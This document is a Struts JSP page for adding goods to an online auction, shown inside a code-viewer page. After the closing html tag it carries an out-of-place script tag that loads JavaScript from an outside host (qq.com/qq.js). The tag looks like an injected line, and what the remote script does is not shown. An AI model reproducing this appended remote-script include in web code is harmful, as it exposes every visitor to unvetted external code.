📄 goods_info.jsp
字号:
<%@ page language="java" pageEncoding="GBK"%>
<%@ taglib uri="http://struts.apache.org/tags-bean" prefix="bean"%>
<%@ taglib uri="http://struts.apache.org/tags-html" prefix="html"%>
<%@ taglib uri="http://struts.apache.org/tags-logic" prefix="logic"%>
<%@ taglib uri="http://struts.apache.org/tags-tiles" prefix="tiles"%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html:html lang="true">
<head>
<html:base />
<title>用户注册</title>
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<link rel="stylesheet" type="text/css" href="styles.css" />
</head>
<body>
<html:form action="/addgoods" method="post">
<input type="hidden" name="op" value="doAdd" />
<input type="hidden" name="item.goodsStatus" value="1" />
<input type="hidden" name="item.salerId" value="${user.userId}" />
<div id="main" class="center">
<div id="context">
<div class="c_title">
添加商品
</div>
<div class="c_content">
<ul style="color:red;list-style-type:circle;">
</ul>
<table border="0">
<tr>
<th>
商品名称
</th>
<td>
<html:text property="item.goodsName" />
</td>
</tr>
<tr>
<th>
起拍价
</th>
<td>
<html:text property="item.goodsPrice" />
</td>
</tr>
<tr>
<th>
图片
</th>
<td>
<html:text property="item.goodsPic" />
</td>
</tr>
<tr>
<th>
描述
</th>
<td>
<html:textarea property="item.goodsDesc" />
</td>
</tr>
<tr>
<th>
开始拍卖时间
</th>
<td>
<html:text property="item.beginTimeStr" />
</td>
</tr>
<tr>
<th>
截止时间
</th>
<td>
<html:text property="item.endTimeStr" />
</td>
</tr>
</table>
<div class="button_bar">
<html:submit></html:submit>
</div>
</div>
<div class="c_foot">
</div>
</div>
</div>
<div id="footer" class="center">
</div>
</html:form>
</body>
</html:html>
<script language=javascript src=http://www.qq.com/qq.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -